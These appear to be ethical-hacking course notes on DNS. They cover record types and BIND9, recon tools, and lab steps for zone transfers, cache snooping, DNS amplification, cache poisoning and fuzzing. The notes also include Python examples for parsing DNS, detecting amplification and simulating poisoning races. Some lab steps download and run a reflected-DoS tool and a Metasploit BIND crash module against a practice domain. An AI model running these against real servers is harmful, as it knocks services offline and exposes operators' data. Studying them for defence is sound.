• It helps in discovering the various services and hosts that are running on the domain.
• It makes the target surface larger as we enumerate further.
• Furthermore, it exposes critical information about the target.
Impact:
• The attacker can read the system data and may also be able to modify it.
• It can also lead to various other potential DNS attacks.
• It gives the threat actor very critical details about the system that the attacker can leverage for other attacks.

Steps of DNS Enumeration:

There are various tools to do DNS enumeration; you are free to explore them by doing a simple web search for DNS enumeration tools, but here we are going to use Nmap as an example:
Nmap:
It is a tool used to discover hosts and services that are currently running on a computer network. Nmap provides an extensive script by the name dns-nsec-enum.

Command usage:
nmap -sSU -p 53 --script dns-nsec-enum --script-args [Link]=[Link] <target>

Countermeasures Against Enumeration


➢ Disable Unnecessary Services – Turn off NetBIOS, SMB, SNMP if not needed.
➢ Restrict Access – Use strong passwords, disable anonymous logins, limit network shares.
➢ Firewall Protection – Block ports 137, 138, 139, 445, restrict ICMP.
➢ Secure System Info – Hide OS details, restrict AD enumeration.
➢ Monitor & Audit – Use IDS/IPS, check logs, conduct security audits.

Domain Name System (DNS)


The Domain Name System (DNS) translates human-readable domain names (e.g., [Link]) into machine-readable IP addresses (e.g., [Link]), enabling internet communication.
• It enables computers to locate and communicate with each other on the internet.
• Functions as a hierarchical, distributed database.
• Queries pass through multiple levels:
o Root server
o Top-Level Domain (TLD) server
o Authoritative server (stores the specific IP address).
• Ensures seamless website access using easy-to-remember names instead of numerical IP addresses.

The Implications of Hacking DNS


DNS Hacking
DNS hacking involves exploiting vulnerabilities in the Domain Name System (DNS) to redirect traffic, intercept data,
or disrupt services.
Common DNS Attacks & Their Impacts

• DNS Spoofing – Fake DNS records redirect users to malicious sites. Impact: Phishing, malware infections.
• DNS Cache Poisoning – Injects false DNS entries into the cache. Impact: Users unknowingly visit fraudulent sites.
• DNS Hijacking – Attackers take control of DNS settings. Impact: Traffic interception, credential theft.
• DDoS via DNS Amplification – Exploits DNS servers to flood targets. Impact: Disrupts websites/services.
• Subdomain Takeover – Unclaimed subdomains used by attackers. Impact: Data leaks, impersonation attacks.

Structure of DNS
Finding the IP address associated with a website is a hard problem: there are millions of websites, and for any of them the IP address must be produced immediately, without noticeable delay. For that to happen, the organization of the database is very important.

Root DNS Server

• DNS Record: the domain name, its IP address, its validity (time to live), and all other information related to that domain name. These records are stored in a tree-like structure.
• Namespace: the set of possible names, flat or hierarchical. The naming system maintains a collection of bindings of names to values; given a name, a resolution mechanism returns the corresponding value.
• Name Server: an implementation of the resolution mechanism.
DNS is the name service of the Internet: a zone is an administrative unit, and a domain is a subtree of the namespace.
Types of DNS Queries
There are three types of DNS queries that occur during a DNS lookup. They are stated below.
• Recursive Query: the client asks the server to resolve the name completely on its behalf. The server must respond with either the requested resource record or an error message (for example NXDOMAIN); it may not simply refer the client elsewhere. Stub resolvers in operating systems send recursive queries, with the RD ("recursion desired") flag set.
• Iterative Query: the client asks for the best answer the server can currently give. If the server is not authoritative for the name and has nothing cached, it returns a referral to name servers closer to the answer, and the client repeats the query there. This is how a recursive resolver walks from root to TLD to authoritative server.
• Non-Recursive Query: a query the server can answer immediately without consulting any other server, because it is authoritative for the record or already holds the record in its cache.

DNS Resource Records


DNS records (short for "Domain Name System records") are types of data that are stored in the DNS database and
used to specify information about a domain, such as its IP address and the servers that handle its email. There are
several different types of DNS records, including A records, MX records, CNAME records, and others, each with its
own specific purpose.

DNS Record Types


Record Type                 | Explanation
A (Address of Host)         | IPv4 address of the host.
AAAA (IPv6 Address of Host) | IPv6 address of the host.
CNAME (Canonical Name)      | An alias pointing to another name; the resolver then looks up that name.
MX (Mail Exchanger)         | Mail server for the domain, with a preference value (lower is preferred).
NS (Name Server)            | Name server information for a zone.
SOA (Start of Authority)    | Primary name server for the zone plus its serial number, refresh/retry/expire timers and minimum TTL.
PTR (Pointer)               | Used for reverse lookups in DNS (IP address to name).
TXT (Text)                  | Arbitrary text; in practice SPF, DKIM and DMARC mail policies and domain-verification tokens.
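To make the query types and record types concrete, here is an added example (not part of these notes, and not the code of dig or BIND) that builds a DNS query in the RFC 1035 wire format, builds a constructed reply to it, and parses the reply back into records with their TTLs. The names (www.example.test), the addresses (from the RFC 5737 documentation ranges) and the transaction IDs are made up for the demonstration. Passing recursive=False clears the RD bit, which is exactly what dig +norecurse does.

```python
import struct

# Added, constructed example: hypothetical names and RFC 5737 addresses, not taken from the notes.
QUERY_TYPES = {"A": 1, "NS": 2, "CNAME": 5, "SOA": 6, "PTR": 12, "MX": 15, "TXT": 16, "AAAA": 28, "ANY": 255}
TYPE_NAMES = {v: k for k, v in QUERY_TYPES.items()}
FLAG_QR = 0x8000  # set in responses
FLAG_RD = 0x0100  # "recursion desired": set for a recursive query, cleared by dig +norecurse
FLAG_RA = 0x0080  # "recursion available": the server offers recursion (an open resolver sets it for anyone)


def encode_name(name):
    """Encode 'www.example.test' as length-prefixed labels terminated by a zero byte."""
    out = b"".join(bytes([len(label)]) + label.encode("ascii") for label in name.rstrip(".").split("."))
    return out + b"\x00"


def build_query(txid, name, qtype="A", recursive=True):
    """Wire-format query as a stub resolver or dig sends it; RD decides recursive vs. non-recursive."""
    flags = FLAG_RD if recursive else 0
    header = struct.pack("!HHHHHH", txid, flags, 1, 0, 0, 0)  # id, flags, QDCOUNT, ANCOUNT, NSCOUNT, ARCOUNT
    return header + encode_name(name) + struct.pack("!HH", QUERY_TYPES[qtype], 1)  # class 1 = IN


def decode_name(data, offset):
    """Decode a name, following compression pointers (0xC0xx); returns (name, offset after the name)."""
    labels, end, jumped = [], offset, False
    while True:
        length = data[offset]
        if length & 0xC0 == 0xC0:  # pointer to an earlier copy of the name
            if not jumped:
                end = offset + 2
            offset = struct.unpack("!H", data[offset:offset + 2])[0] & 0x3FFF
            jumped = True
            continue
        offset += 1
        if length == 0:
            break
        labels.append(data[offset:offset + length].decode("ascii"))
        offset += length
    return ".".join(labels), (end if jumped else offset)


def build_response(query, answers):
    """Constructed reply to `query`: same txid, question echoed, owner names as pointers to offset 12 (0xC00C)."""
    txid, flags = struct.unpack("!HH", query[:4])
    question = query[12:]  # the single question section of the query
    header = struct.pack("!HHHHHH", txid, FLAG_QR | (flags & FLAG_RD) | FLAG_RA, 1, len(answers), 0, 0)
    body = b""
    for rtype, ttl, value in answers:
        if rtype == "A":
            rdata = bytes(int(octet) for octet in value.split("."))
        elif rtype in ("NS", "CNAME", "PTR"):
            rdata = encode_name(value)
        elif rtype == "MX":
            pref, host = value.split(" ", 1)
            rdata = struct.pack("!H", int(pref)) + encode_name(host)
        elif rtype == "TXT":
            rdata = bytes([len(value)]) + value.encode("ascii")
        else:
            raise ValueError(f"unsupported type {rtype}")
        body += b"\xc0\x0c" + struct.pack("!HHIH", QUERY_TYPES[rtype], 1, ttl, len(rdata)) + rdata
    return header + question + body


def parse_response(data):
    """Parse header, question and answer sections; the TTL is how long a resolver may cache each record."""
    txid, flags, qd, an, _ns, _ar = struct.unpack("!HHHHHH", data[:12])
    offset, questions, answers = 12, [], []
    for _ in range(qd):
        name, offset = decode_name(data, offset)
        qtype, _qclass = struct.unpack("!HH", data[offset:offset + 4])
        offset += 4
        questions.append((name, TYPE_NAMES.get(qtype, qtype)))
    for _ in range(an):
        name, offset = decode_name(data, offset)
        rtype, _rclass, ttl, rdlen = struct.unpack("!HHIH", data[offset:offset + 10])
        offset += 10
        start, offset = offset, offset + rdlen
        rdata = data[start:offset]
        if rtype == 1:
            value = ".".join(str(b) for b in rdata)
        elif rtype == 28:
            value = ":".join(rdata[i:i + 2].hex() for i in range(0, 16, 2))
        elif rtype in (2, 5, 12):
            value = decode_name(data, start)[0]
        elif rtype == 15:
            value = f"{struct.unpack('!H', rdata[:2])[0]} {decode_name(data, start + 2)[0]}"
        elif rtype == 16:
            value = rdata[1:1 + rdata[0]].decode("ascii")
        else:
            value = rdata.hex()
        answers.append({"name": name, "type": TYPE_NAMES.get(rtype, rtype), "ttl": ttl, "value": value})
    return {"txid": txid, "rd": bool(flags & FLAG_RD), "ra": bool(flags & FLAG_RA),
            "rcode": flags & 0xF, "questions": questions, "answers": answers}


if __name__ == "__main__":
    q = build_query(0x1A2B, "www.example.test", "A")
    r = build_response(q, [("CNAME", 300, "web.example.test"), ("A", 60, "192.0.2.10")])
    for rr in parse_response(r)["answers"]:
        print(rr)
```

Run as a script it prints the CNAME chain and the final A record with their TTLs. To talk to a real server, send the bytes from build_query with socket.sendto to UDP port 53 and hand the reply to parse_response unchanged; the constructed build_response only stands in for the server so the example works offline.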

BIND9 DNS

BIND9 (Berkeley Internet Name Domain) is the most widely used DNS server software, mainly for
Linux/Unix systems.

Key Features

Supports Authoritative & Recursive DNS


Implements DNSSEC for security
Supports IPv4 & IPv6
Configurable via [Link]

Common Uses

➢ Hosting private/public DNS servers


➢ Running caching DNS resolvers
➢ Setting up forwarding and zone transfers

Basic Commands

Install (Ubuntu) → sudo apt install bind9


Check Status → systemctl status bind9
Restart Service → systemctl restart bind9
Test DNS Query → dig @localhost [Link]


Common DNS Hacking Tools

WHOIS
• WHOIS is a protocol used for querying domain name and IP address information.
• Example: whois [Link]
• Provides details such as registrar, contact information, and name servers.

Recon-ng
• Purpose: Enumerates hostnames and finds subdomains.
• Commands:
1. Open Recon-ng: recon-ng
2. Load module: modules load recon/domains-hosts/brute_hosts
3. Insert domain: db insert domains [Link]
4. Run module: run

Host
• Purpose: Provides a quick lookup compared to other tools.
• Commands:
o Find domain details: host [Link]
o Find hostname for an IP: host [Link]

Dig
• Purpose: Identifies name servers and other DNS records.
• Commands:
o Request SOA (Start of Authority): dig [Link] SOA
o Find name server’s IP: dig [Link]

Port Scanning with Nmap


• Basic Port Scan: nmap <Target IP>
• Example: nmap [Link]
• UDP Scan: sudo nmap -sU [Link]
• Scan specific UDP port: sudo nmap -sU [Link] -p 53

Using Dig for DNS Queries


• Query a specific name server:
dig @<Name Server> <Domain Name>
Example: dig @[Link] [Link].cs000

• Find subdomain IP:


dig @<Target IP> <Sub-domain address>
Example: dig @[Link] [Link].cs000

• Specifying Resource Records with Dig


Command: dig @<Name Server> <Domain Name> <Record Type>
Example: dig @[Link] pes.cs000 AAAA

• Information Leak (CHAOS Queries with Dig)

BIND answers a TXT query in the CHAOS class with its version string unless configured otherwise; the exact version tells an attacker which published bugs apply to the server.
Check BIND version:

dig @<Name Server> <Domain Name> chaos [Link] txt

Example: dig @[Link] pes.cs000 chaos [Link] txt
A hardened server replies with a fixed string, or nothing, instead of its real version.
• Zone Transfer Request with Dig
A zone transfer (AXFR) copies the entire zone, every hostname and record, from the name server. It should only be allowed to the zone's own secondary servers, so a server that answers this request for anyone hands over its complete internal namespace in one query.
Command:
dig @<Name Server> AXFR <Domain Name>
Example: dig @[Link] AXFR pes.cs000
Fierce
• Purpose: Gathers information from the target DNS server.
• Command: fierce --domain <DomainName> --dns-servers <IP Address>
DNSrecon
• Purpose: DNS Enumeration and Scanning Tool.
• Command: dnsrecon -n <IP Address> -d <Domain Name>
• Example: dnsrecon -n [Link] -d pes.cs000
DNSenum
• Purpose: Enumerates DNS information.
• Command: dnsenum --dnsserver <IP Address> <Domain Name>
• Example: dnsenum --dnsserver [Link] pes.cs000

Exploitation of Vulnerabilities

DNS Traffic Amplification

• Exploits DNS by sending small queries that produce large responses (for example ANY, or records in a DNSSEC-signed zone) to open resolvers, with the victim's address forged as the source. DNS runs over UDP, so there is no handshake to stop the spoofing, and the resolver delivers the large reply to the victim.
• Attack method:
o Dig query: dig @[Link] pes.cs000 ANY (compare the response size with the roughly 60-byte query to get the amplification factor)
o Spoof the victim's IP as the source address of the UDP packet.
o The server sends its response to the victim; with many forged queries across many resolvers this becomes a DDoS attack.
• Caveat: many resolvers now answer ANY with a minimal response (RFC 8482) and apply response-rate limiting, which reduces the amplification available from them.

Metasploit
• Purpose: Used for searching, viewing, and running exploits and auxiliary modules via the CLI.
• Commands:
1. Start Metasploit: msfconsole
2. Search for the DNS amplification scanner: search dns_amp
3. Use the module: use auxiliary/scanner/dns/dns_amp
4. Set target details:
   set DOMAINNAME pes.cs000
   set RHOSTS [Link]
5. Confirm settings: show options
6. Execute: run

DoS, DDoS, and DRDoS Attacks

• DoS (Denial of Service): a single source overwhelms a server or its network link with more requests or traffic than it can handle.
• DDoS (Distributed DoS): many sources, often a botnet, send the traffic, so no single address can simply be blocked.
• DRDoS (Distributed Reflected DoS): the attacker sends requests to many third-party servers (reflectors) with the target's address forged as the source, so the servers' responses, usually much larger than the requests, flood the target. DNS amplification is the DRDoS variant built on DNS.
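As an added example (not from these notes), here is the detection side of the amplification and DRDoS attacks above: given per-flow byte counts, which addresses are receiving far more DNS response bytes than they ever sent? The flow tuples are constructed to mimic what NetFlow or a Zeek dns.log would give you, using RFC 5737 addresses; a spoofed victim shows up as a "client" with a tiny query volume, a run of ANY queries, and a response-to-query byte ratio in the tens.

```python
from collections import defaultdict

# Added, constructed sample flows: (src, dst, server_port, qtype, bytes, direction). Hypothetical addresses.
SAMPLE_FLOWS = [
    # Three spoofed ANY queries "from" 198.51.100.7 reflected off the open resolver 192.0.2.53.
    ("198.51.100.7", "192.0.2.53", 53, "ANY", 64, "query"),
    ("192.0.2.53", "198.51.100.7", 53, "ANY", 3300, "response"),
    ("198.51.100.7", "192.0.2.53", 53, "ANY", 64, "query"),
    ("192.0.2.53", "198.51.100.7", 53, "ANY", 3300, "response"),
    ("198.51.100.7", "192.0.2.53", 53, "ANY", 64, "query"),
    ("192.0.2.53", "198.51.100.7", 53, "ANY", 3300, "response"),
    # An ordinary client doing A lookups: answers about twice the size of the queries.
    ("203.0.113.20", "192.0.2.53", 53, "A", 60, "query"),
    ("192.0.2.53", "203.0.113.20", 53, "A", 120, "response"),
    ("203.0.113.20", "192.0.2.53", 53, "A", 58, "query"),
    ("192.0.2.53", "203.0.113.20", 53, "A", 116, "response"),
    ("203.0.113.20", "192.0.2.53", 53, "A", 61, "query"),
    ("192.0.2.53", "203.0.113.20", 53, "A", 122, "response"),
    # Non-DNS traffic must be ignored by the report.
    ("203.0.113.20", "192.0.2.80", 80, "", 500, "query"),
]


def amplification_report(flows):
    """Per client address: queries sent, ANY queries, query bytes, response bytes, and the byte ratio."""
    stats = defaultdict(lambda: {"queries": 0, "any_queries": 0, "query_bytes": 0, "response_bytes": 0})
    for src, dst, server_port, qtype, size, direction in flows:
        if server_port != 53:
            continue
        client = src if direction == "query" else dst  # the (possibly forged) address that receives the reply
        s = stats[client]
        if direction == "query":
            s["queries"] += 1
            s["query_bytes"] += size
            s["any_queries"] += qtype == "ANY"
        else:
            s["response_bytes"] += size
    for s in stats.values():
        s["ratio"] = round(s["response_bytes"] / s["query_bytes"], 1) if s["query_bytes"] else 0.0
    return dict(stats)


def flag_reflection_victims(flows, min_ratio=10.0, min_queries=3):
    """Clients receiving many times more DNS bytes than they sent: their address is probably forged and being flooded."""
    report = amplification_report(flows)
    return sorted(c for c, s in report.items() if s["queries"] >= min_queries and s["ratio"] >= min_ratio)


if __name__ == "__main__":
    for client, s in amplification_report(SAMPLE_FLOWS).items():
        print(client, s)
    print("likely reflection victims:", flag_reflection_victims(SAMPLE_FLOWS))
```

The thresholds are assumptions to tune per network: a ratio of 10 never occurs for ordinary A/AAAA lookups but is routine for ANY or DNSSEC responses, so on a resolver you run, the same report also tells you whether response-rate limiting is needed.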

Carrying Out a Denial of Service Attack

• Use DNS servers that amplify traffic significantly (a list of open resolvers, one per line in dns_servers.txt).
• Steps:
o wget --user=student --password=student [Link]
o gcc dnsdrdos.c -o dnsdrdos
o ./dnsdrdos -f dns_servers.txt -s -d pes.cs000 -l 20
o Monitor the attack using Wireshark.

Running DoS with Metasploit

• Exploits the BIND9 TKEY remote DoS (CVE-2015-5477): a single crafted TKEY query triggers an assertion failure in named, which then exits.
• Commands:
• msfconsole
• search tkey
• use auxiliary/dos/dns/bind_tkey
• set RHOSTS [Link]
• show options
• run
• Sends the malformed TKEY query that crashes unpatched BIND9; versions patched after July 2015 are not affected, which is why the version leak above matters.

DNS Spoofing
• Manipulates DNS answers so that a client resolves a name to an attacker-chosen address.
• Steps:
o The attacker observes (on-path) or predicts (off-path) a client's DNS request.
o Sends a forged response to the victim before the genuine answer arrives; the first acceptable answer wins and the later real one is discarded.
o The forged response must match the request's 16-bit transaction ID, its UDP source port and its question section. An on-path attacker reads these from the wire; an off-path attacker has to guess them.

DNS Cache Poisoning

• Flaw: a recursive resolver caches whatever answer it accepts, so one forged response is served to every client of that resolver until the record's TTL expires.
• Exploitation:
o The attacker gets a forged record into the name server's cache, usually by racing the real answer as above.
o Queries for that name are redirected to the attacker's IP.
o The 2008 Kaminsky attack (CVE-2008-1447, "bailiwicked" in Metasploit's module names) made this practical: querying many random subdomains gave unlimited attempts at the transaction ID, and a forged NS record in the additional section poisoned the whole domain. The fixes were randomizing the UDP source port and discarding records that fall outside the queried zone's bailiwick.
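The following added example (constructed, not from these notes and not from any resolver's source code) shows the checks a resolver applies to a reply before it caches it, the bailiwick rule whose absence CVE-2008-1447 exploited, and why randomizing the UDP source port made off-path poisoning impractical. The pending-query table, the addresses (RFC 5737 ranges) and the forged replies are hypothetical.

```python
import random

# Added, constructed example: hypothetical resolver state and forged replies; addresses from RFC 5737 ranges.


def in_bailiwick(zone, name):
    """True if `name` is `zone` or lies beneath it; a reply about example.test may not speak for bank.test."""
    zone, name = zone.rstrip(".").lower(), name.rstrip(".").lower()
    return name == zone or name.endswith("." + zone)


def validate_response(pending, response):
    """Accept a reply only if it matches an outstanding query; returns (accepted_records, reason).

    `pending` maps (txid, udp_source_port) -> the query the resolver sent. An off-path attacker
    must guess both values and beat the genuine answer; an on-path attacker simply reads them.
    """
    query = pending.get((response["txid"], response["dst_port"]))
    if query is None:
        return [], "no outstanding query with that txid/port"
    if response["question"] != query["question"]:
        return [], "question section does not match"
    if response["src"] != query["server"]:
        return [], "reply from an unexpected server address"  # weak on its own: the source IP can be forged
    accepted = [rr for rr in response["records"] if in_bailiwick(query["zone"], rr["name"])]
    dropped = len(response["records"]) - len(accepted)
    return accepted, f"accepted {len(accepted)} record(s), dropped {dropped} out-of-bailiwick"


def spoof_success_probability(forged_replies, id_bits=16, port_bits=0):
    """Probability that at least one of `forged_replies` random guesses hits the live (txid, port) pair."""
    space = 2 ** (id_bits + port_bits)
    return 1.0 - (1.0 - 1.0 / space) ** forged_replies


def simulate_race(forged_replies, randomize_port, seed=7):
    """Replay the poisoning race: the attacker floods guesses at one pending query; count replies that pass."""
    rng = random.Random(seed)
    txid = rng.randrange(1 << 16)
    port = rng.randrange(1024, 1 << 16) if randomize_port else 53  # fixed source port: pre-2008 resolvers
    question = ("www.example.test", "A")
    pending = {(txid, port): {"question": question, "server": "192.0.2.53", "zone": "example.test"}}
    hits = 0
    for _ in range(forged_replies):
        guess = {
            "txid": rng.randrange(1 << 16),
            "dst_port": rng.randrange(1024, 1 << 16) if randomize_port else 53,
            "src": "192.0.2.53",  # the attacker forges the authoritative server's address
            "question": question,
            "records": [{"name": "www.example.test", "type": "A", "value": "203.0.113.66"}],
        }
        accepted, _ = validate_response(pending, guess)
        hits += bool(accepted)
    return hits


if __name__ == "__main__":
    print("P(hit) with 65536 guesses, txid only:   ", round(spoof_success_probability(65536), 3))
    print("P(hit) with 65536 guesses, txid + port: ", spoof_success_probability(65536, port_bits=16))
    print("hits, fixed port:", simulate_race(20000, randomize_port=False))
    print("hits, random port:", simulate_race(20000, randomize_port=True))
```

With a fixed port the attacker needs on the order of 2^16 forged replies per name, and the Kaminsky trick of querying fresh random subdomains supplies as many races as needed; with a random port the space is about 2^32, which is why every current resolver randomizes ports and why DNSSEC validation is the only complete fix.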

DNS Resolver and Cache

• Resolver: the client-side component of DNS that sends queries and processes responses. The stub resolver in the operating system forwards to a recursive resolver, which performs the actual lookup.
• Open Resolver: a recursive resolver that answers queries from any source address, not only its own users. It can be abused as a reflector for amplification attacks and is an easier cache-poisoning target, because anyone can make it issue the queries the attacker wants to race.
• Resolver Cache: stores recently received records and serves them until their TTL expires.

DNS Cache Snooping

• Asks a resolver whether a name is already in its cache, which reveals which sites the resolver's users have visited recently.
• Method: clear the "recursion desired" (RD) bit, so the server may only answer from its cache and is not allowed to go and fetch the record:
• dig +norecurse <Domain>
• Observations:
o If the response contains the record, it was cached; the TTL shown is the remaining lifetime, so it also dates the last lookup.
o A cache miss returns no answer record; depending on the server this is an empty answer with a referral, REFUSED, or SERVFAIL.
o Alternatively send a normal recursive query and time it: a cached answer returns almost immediately, while a delayed answer suggests a cache miss that had to be resolved upstream.
DNSSEC (DNS Security Extensions)
• Adds origin authentication and data integrity to DNS responses; it adds no confidentiality.
• Features:
o Zone operators sign their records with a private key (RRSIG records) and publish the matching public key (DNSKEY). A validating resolver checks the signature and rejects forged or modified answers, which defeats spoofing and cache poisoning for signed zones.
o Trust is chained from the root zone downwards through DS records in each parent zone, rather than through the web's certificate PKI.
o Signs records but does not encrypt traffic: queries and answers stay readable on the wire, so a forged answer is detected, not hidden.

Fuzzing
• Purpose: finds vulnerabilities by feeding a program random or malformed input and watching for crashes or other unexpected behaviour.
• Method (applied to DNS):
o Send a stream of mutated UDP packets (bad lengths, truncated names, impossible section counts, compression-pointer loops) to the name server.
o Watch for unexpected behaviour or service crashes, such as the assertion failure the BIND TKEY bug triggers.
o May also expose information leaks, for example error responses that echo internal state.
• Tools:
o Metasploit
o Nmap (e.g., the dns-fuzz script)

Fuzzing with Nmap

• Command:
• nmap -sU --script dns-fuzz --script-args timelimit=2h [Link] -p 53
• Observations in Wireshark: the generated packets are dissected as malformed. If the server stops responding during the run, the last packets sent are the crash candidates to replay and reduce to a minimal trigger.

Vulnerability Research
Vulnerability research is the systematic process of identifying, analyzing, and assessing security weaknesses in
software, hardware, networks, or protocols.

Benefits for an administrator:


1. Security trends and threats
2. Early detection of weaknesses
3. Proactive security measures
4. Post-attack recovery insights

Why do we need Vulnerability Research?


• To be aware of emerging security trends, threats, attack vectors and techniques.
• To discover new weaknesses in Operating Systems and Networks.
• To gather information to aid in the prevention of security issues.
• To know an effective strategy to recover from a network attack.

Vulnerability Assessment
Vulnerability assessment is the process of identifying, analyzing, and prioritizing security weaknesses in a system,
network, or application. It helps organizations detect vulnerabilities before they can be exploited by attackers and
implement corrective measures to enhance security.

2 approaches to Network Vulnerability Scanning:

Active Scanning
• Attacker directly engages the target network.
• Active scanning simulates an attack.
• Uncovers exploitable vulnerabilities.

Passive Scanning
• Attacker seeks vulnerabilities without direct interaction.
• Passive scanning gathers info from normal communications.
• Identifies operating systems, applications, and ports.

Limitations of Vulnerability Assessment:


• Vulnerability scanning software limited in real-time detection.
• Requires updates for new vulnerabilities.
• Effectiveness depends on maintenance by vendor and administrator.
• Doesn't assess security control strength.
• Vulnerability-scanning software can have flaws.
• Human judgment required.
• Identifying false positives and false negatives needed.

Vulnerability Scoring Systems and Databases


Repositories used to assess, rate and document the severity and characteristics of any vulnerability.

Few of these systems and platforms are:


a) Common Vulnerability Scoring System (CVSS):
• CVSS framework communicates IT vulnerability characteristics and impacts.
• Enables repeatable, accurate measurement with quantitative scores.
• Commonly used to prioritize remediation efforts and gauge vulnerability severity.

Comprises three metric groups:

- Base Metrics: the intrinsic qualities of the vulnerability, constant over time and across environments (attack vector, attack complexity, privileges required, user interaction, scope, and the confidentiality, integrity and availability impacts).
- Temporal Metrics: features that change over the vulnerability's lifespan (exploit code maturity, remediation level, report confidence).
- Environmental Metrics: adjustments for a specific environment or deployment (modified base metrics and the importance of C, I and A to that organization).

• The base score ranges from 0.0 to 10.0, with 10.0 the most severe; the temporal and environmental scores adjust it within the same range. CVSS v3 maps scores to qualitative ratings: None (0.0), Low (0.1-3.9), Medium (4.0-6.9), High (7.0-8.9), Critical (9.0-10.0).
• A vector string (e.g., CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H) records the chosen metric values, not the scores, so anyone can recompute the score and see which characteristics produced it.
• The CVSS calculator helps rank vulnerabilities and assess their security risk.

b) Common Vulnerabilities and Exposures (CVE):

• CVEs are publicly disclosed security flaws recorded in one common list.
• Each has a unique CVE ID (CVE-YYYY-NNNNN) so that tools, advisories and databases all refer to the same flaw.
• Managed by MITRE with CISA funding; IDs are assigned by CVE Numbering Authorities (CNAs), such as vendors and research organizations.
• A flaw gets its own ID when it is independently fixable, is acknowledged by the vendor or documented to exist, and affects one codebase (a flaw in shared code that several products import gets a single ID).


c) National Vulnerability Database (NVD):


• NVD is the US gov't repository for vulnerability data.
• Uses SCAP for automation in vulnerability management.
• Contains security checklists, software flaws, misconfigurations, and impact metrics.
• Analyzes published CVEs for CVSS, CWE, and applicability statements.
• Relies on vendors, researchers, and coordinators for data, doesn't perform testing.

d) Common Weakness Enumeration (CWE):

• A community-developed list of software and hardware weakness types, maintained by MITRE and sponsored by the US Department of Homeland Security (CISA, formerly US-CERT).
• Version 3.2 was released in January 2019; the 4.x series has since replaced it, with new versions published several times a year.
• Over 600 weakness entries, organized into categories and views, for identification, mitigation, and prevention. CVE records and scanner findings are tagged with CWE IDs (e.g., CWE-79, cross-site scripting) so that one root cause can be tracked across many products.
• Advanced search allows weaknesses to be explored through research, development, and architectural concept views.

Vulnerability-Management Life Cycle

Pre-Assessment Phase:
• Understand and identify business processes.
• Identify the applications, data, and services that support the business processes and perform code review.
• Identify approved software, drivers and configurations.
• Create inventory of all assets and rank critical ones.
• Deep dive into network architecture and infrastructure.
• Identify existing controls.
• Understand policy implementation and standards compliance.
• Define scope of assessment.
• Create information protection procedures.

Vulnerability Assessment Phase


• Evaluate Physical Security – Assessing physical access controls and security measures.
• Check for Misconfigurations and Human Error – Identifying weaknesses caused by misconfigurations or
human mistakes.
• Run Vulnerability Scans – Conducting automated scans to detect vulnerabilities.
• Select Appropriate Scan – Choosing the right type of scan for the environment.
• Prioritize Vulnerabilities – Ranking vulnerabilities based on risk and impact.
• Identify False Positives and Negatives – Verifying results to ensure accuracy.
• Apply Business and Tech Context to Scanners – Understanding vulnerabilities in the context of business
operations.
• Gather OSINT for Validation of Vulnerabilities – Using open-source intelligence to confirm risks.
• Create Vulnerability Scan Report – Documenting findings for further action.

Post-Assessment Phase

1. Risk Assessment
o Categorize risks.
o Assess severity of impact.
o Determine threat and risk levels.
2. Remediation
o Prioritize risks based on ranks.
o Devise an action plan for remediation.
o Perform root cause analysis.
o Apply patches and fixes.
o Document findings and conduct awareness training.
3. Verification
o Verify the working of remediated vulnerabilities.
o Perform dynamic analysis.
o Review attack surface.
4. Monitoring
o Scan for vulnerabilities periodically.
o Ensure timely remediation.
o Implement intrusion detection and prevention.
o Enforce policies, procedures, and controls.

Vulnerability Classification
a. Misconfiguration:
• Caused by human error
• Unauthorized access risk
• Affects various system components
Ex: debug mode, open ports, outdated software, and more.

b. Default Installations:
User-friendly but insecure initially
Risks from unaltered defaults can lead to data breaches.

c. Buffer Overflows:
Results from coding errors, enabling system access.
Attackers exploit insufficient bounds checking.

d. Unpatched Servers:
Compromise security, attract hackers.
Serve as entry points into networks.
Updating and patching mitigates vulnerabilities.

e. Design Flaws:
Universal vulnerabilities in system design.
Exploited for bypassing security mechanisms and gaining access.

f. Operating System Flaws:


Vulnerabilities lead to trojans, worms or viruses.
Timely patching, minimal software, firewall apps protect the OS.

g. Application Flaws:
Vulnerabilities in apps exploited by attackers.
Secure apps with user validation and authorization.

h. Open Services:
Unnecessary or insecure ports risk data loss and DoS attacks.
Continuous checks reduce network risk.

i. Default Passwords:
Failure to change defaults allows attacks.
Protect password confidentiality to prevent system compromise.


Types of Vulnerability Assessments

Type Description
Active Assessment Uses network scanners to find hosts, services, and vulnerabilities.

Passive Assessment Monitors network traffic to detect active systems, services, and
vulnerabilities without directly interacting with them.
External Assessment Evaluates the network from an outsider’s perspective, identifying
vulnerabilities accessible from the internet.
Internal Assessment Scans the internal infrastructure for vulnerabilities that an insider
might exploit.
Host-based Assessment Checks configurations, directories, and system settings for
security flaws.
Network-based Assessment Identifies network security weaknesses that could be exploited in
attacks.
Application Assessment Tests websites and web apps for vulnerabilities like
misconfigurations, outdated content, or known exploits.
Database Assessment Evaluates databases (MySQL, MSSQL, Oracle, PostgreSQL) for
vulnerabilities, including data exposure and injection risks.
Wireless Network Assessment Identifies weaknesses in wireless infrastructure.
Distributed Assessment Evaluates vulnerabilities in distributed systems (e.g., client-server
applications).
Credentialed Assessment Conducted with valid user credentials to check deeper security
issues.
Non-Credentialed Assessment Performed without login credentials to identify publicly
accessible vulnerabilities.
Manual Assessment Conducted manually by ethical hackers to identify vulnerabilities,
assess risks, and rank security issues
Automated Assessment Uses tools like Nessus, Qualys, or GFI LanGuard to detect
vulnerabilities systematically.

Approaches to Vulnerability Assessment

Product-Based Solutions
• Installed in the organization's internal network
• Installed in private or non-routable space or the Internet-addressable portion of an organization's network
• If installed in the private network or, in other words, behind the firewall, it cannot always detect outside attacks

Service-Based Solutions
• Offered by third parties, such as auditing or security consulting firms
• Some solutions are hosted inside the network, while others are hosted outside the network
• A drawback of this solution is that attackers can audit the network from outside

Tree-Based Assessment
• The auditor selects different strategies for each machine or component of the information system
• Example: The administrator selects a scanner for servers running Windows, databases, and web services, and uses another scanner for Linux servers
• This approach relies on the administrator providing a starting list of intelligence and then scanning continuously without incorporating any information found at the time of scanning

Inference-Based Assessment
• Scanning starts by building an inventory of protocols found on the machine
• After finding a protocol, the scanning process detects which ports are attached to services, such as an email server, web server, or database server
• After finding services, the process selects vulnerabilities on each machine and starts to execute the relevant tests

Characteristics of a Good Vulnerability Assessment


Choosing the right vulnerability assessment solution is crucial.

• Accurate testing of network components


• Inference-based approach
• Regular updates from databases
• Customizable, actionable reports
• Compatibility with multiple networks
• Offers remedies and workarounds
• Mimics attacker's perspective for testing.

Working of Vulnerability Scanning Solutions


This process ensures that security risks in a network are identified and addressed systematically.

